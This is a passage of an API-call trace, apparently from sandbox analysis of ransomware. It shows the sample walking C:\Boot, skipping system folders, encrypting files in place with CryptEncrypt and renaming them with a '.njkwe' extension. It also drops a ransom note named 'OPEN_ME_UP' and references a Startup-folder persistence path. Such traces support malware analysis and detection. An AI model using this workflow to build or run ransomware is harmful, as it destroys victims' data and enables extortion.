ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0064.950] lstrcmpiW (lpString1="BCD.LOG", lpString2="Windows") returned -1 [0064.950] lstrcmpiW (lpString1="BCD.LOG", lpString2="$Recycle.bin") returned 1 [0064.950] lstrcmpiW (lpString1="BCD.LOG", lpString2="System Volume Information") returned -1 [0064.950] lstrcmpiW (lpString1="BCD.LOG", lpString2="Program Files") returned -1 [0064.950] lstrcmpiW (lpString1="BCD.LOG", lpString2="Program Files (x86)") returned -1 [0064.950] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0064.951] StrStrIW (lpFirst="BCD.LOG", lpSrch=".njkwe") returned 0x0 [0064.951] lstrcmpW (lpString1="BCD.LOG", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.951] lstrcmpW (lpString1="BCD.LOG", lpString2="taridd") returned -1 [0064.951] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\BCD.LOG", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.951] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.951] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0064.951] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Windows") returned -1 [0064.951] lstrcmpiW (lpString1="BCD.LOG1", lpString2="$Recycle.bin") returned 1 [0064.951] lstrcmpiW (lpString1="BCD.LOG1", lpString2="System Volume Information") returned -1 [0064.951] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Program Files") returned -1 [0064.951] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Program Files (x86)") returned -1 [0064.951] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0064.951] StrStrIW (lpFirst="BCD.LOG1", lpSrch=".njkwe") returned 0x0 [0064.951] lstrcmpW (lpString1="BCD.LOG1", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.951] lstrcmpW (lpString1="BCD.LOG1", lpString2="taridd") returned -1 [0064.951] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\BCD.LOG1", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.951] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.951] GetTickCount () returned 0x1150a4d [0064.951] GetTickCount () returned 0x1150a4d [0064.951] GetTickCount () returned 0x1150a4d [0064.951] GetTickCount () returned 0x1150a4d [0064.951] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.952] GetProcessHeap () returned 0xbe0000 [0064.952] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.952] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x0, lpOverlapped=0x0) returned 1 [0064.952] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.952] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x0, lpOverlapped=0x0) returned 1 [0064.952] GetProcessHeap () returned 0xbe0000 [0064.952] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.952] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.952] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.953] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.953] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.953] CloseHandle (hObject=0x428) returned 1 [0064.954] GetProcessHeap () returned 0xbe0000 [0064.954] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.954] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1_r00t_{3sXlE5}.njkwe") returned 40 [0064.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG1_r00t_{3sXlE5}.njkwe" (normalized: "c:\\boot\\bcd.log1_r00t_{3sxle5}.njkwe")) returned 1 [0064.954] GetProcessHeap () returned 0xbe0000 [0064.954] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.954] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0064.954] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Windows") returned -1 [0064.954] lstrcmpiW (lpString1="BCD.LOG2", lpString2="$Recycle.bin") returned 1 [0064.954] lstrcmpiW (lpString1="BCD.LOG2", lpString2="System Volume Information") returned -1 [0064.954] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Program Files") returned -1 [0064.954] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Program Files (x86)") returned -1 [0064.954] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0064.955] StrStrIW (lpFirst="BCD.LOG2", lpSrch=".njkwe") returned 0x0 [0064.955] lstrcmpW (lpString1="BCD.LOG2", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.955] lstrcmpW (lpString1="BCD.LOG2", lpString2="taridd") returned -1 [0064.955] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\BCD.LOG2", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.955] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.955] GetTickCount () returned 0x1150a4d [0064.955] GetTickCount () returned 0x1150a4d [0064.955] GetTickCount () returned 0x1150a4d [0064.955] GetTickCount () returned 0x1150a4d [0064.955] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.955] GetProcessHeap () returned 0xbe0000 [0064.955] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.955] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x0, lpOverlapped=0x0) returned 1 [0064.955] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.955] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x0, lpOverlapped=0x0) returned 1 [0064.955] GetProcessHeap () returned 0xbe0000 [0064.955] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.955] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.955] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.956] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.956] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.956] CloseHandle (hObject=0x428) returned 1 [0064.957] GetProcessHeap () returned 0xbe0000 [0064.957] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.957] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2_r00t_{3sXlE5}.njkwe") returned 40 [0064.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG2_r00t_{3sXlE5}.njkwe" (normalized: "c:\\boot\\bcd.log2_r00t_{3sxle5}.njkwe")) returned 1 [0064.957] GetProcessHeap () returned 0xbe0000 [0064.958] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.958] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0064.958] lstrcmpiW (lpString1="bg-BG", lpString2="Windows") returned -1 [0064.958] lstrcmpiW (lpString1="bg-BG", lpString2="$Recycle.bin") returned 1 [0064.958] lstrcmpiW (lpString1="bg-BG", lpString2="System Volume Information") returned -1 [0064.958] lstrcmpiW (lpString1="bg-BG", lpString2="Program Files") returned -1 [0064.958] lstrcmpiW (lpString1="bg-BG", lpString2="Program Files (x86)") returned -1 [0064.958] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG") returned 17 [0064.958] lstrcmpW (lpString1="bg-BG", lpString2=".") returned 1 [0064.958] lstrcmpW (lpString1="bg-BG", lpString2="..") returned 1 [0064.958] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\bg-BG", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0064.958] GetProcessHeap () returned 0xbe0000 [0064.958] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.958] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\*") returned 19 [0064.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\bg-BG\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ea0 [0064.958] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.958] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.958] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.958] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.958] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.958] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\.") returned 19 [0064.958] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.958] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0064.958] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.958] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.958] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.958] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.958] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.959] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\..") returned 20 [0064.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.959] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.959] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0064.959] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0064.959] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0064.959] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0064.959] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0064.959] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 33 [0064.959] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0064.959] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.959] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0064.959] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.959] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.959] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0064.959] FindClose (in: hFindFile=0xc19ea0 | out: hFindFile=0xc19ea0) returned 1 [0064.959] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0064.959] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\bg-bg\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.969] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0064.970] CloseHandle (hObject=0x428) returned 1 [0064.970] GetProcessHeap () returned 0xbe0000 [0064.970] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.970] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0064.970] lstrcmpiW (lpString1="bootspaces.dll", lpString2="Windows") returned -1 [0064.970] lstrcmpiW (lpString1="bootspaces.dll", lpString2="$Recycle.bin") returned 1 [0064.970] lstrcmpiW (lpString1="bootspaces.dll", lpString2="System Volume Information") returned -1 [0064.970] lstrcmpiW (lpString1="bootspaces.dll", lpString2="Program Files") returned -1 [0064.970] lstrcmpiW (lpString1="bootspaces.dll", lpString2="Program Files (x86)") returned -1 [0064.971] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bootspaces.dll") returned 26 [0064.971] StrStrIW (lpFirst="bootspaces.dll", lpSrch=".njkwe") returned 0x0 [0064.971] lstrcmpW (lpString1="bootspaces.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.971] lstrcmpW (lpString1="bootspaces.dll", lpString2="taridd") returned -1 [0064.971] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\bootspaces.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.971] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.972] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xef703e94, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0064.972] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Windows") returned -1 [0064.972] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="$Recycle.bin") returned 1 [0064.972] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="System Volume Information") returned -1 [0064.972] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Program Files") returned -1 [0064.972] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Program Files (x86)") returned -1 [0064.972] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0064.972] StrStrIW (lpFirst="BOOTSTAT.DAT", lpSrch=".njkwe") returned 0x0 [0064.972] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.972] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="taridd") returned -1 [0064.972] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\BOOTSTAT.DAT", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.972] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.976] GetTickCount () returned 0x1150a5d [0064.976] GetTickCount () returned 0x1150a5d [0064.976] GetTickCount () returned 0x1150a5d [0064.976] GetTickCount () returned 0x1150a5d [0064.976] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.976] GetProcessHeap () returned 0xbe0000 [0064.976] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.976] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.978] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.978] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.978] GetProcessHeap () returned 0xbe0000 [0064.978] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.978] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.978] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.979] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.979] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.979] CloseHandle (hObject=0x428) returned 1 [0064.981] GetProcessHeap () returned 0xbe0000 [0064.981] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.981] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT_r00t_{3sXlE5}.njkwe") returned 44 [0064.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), 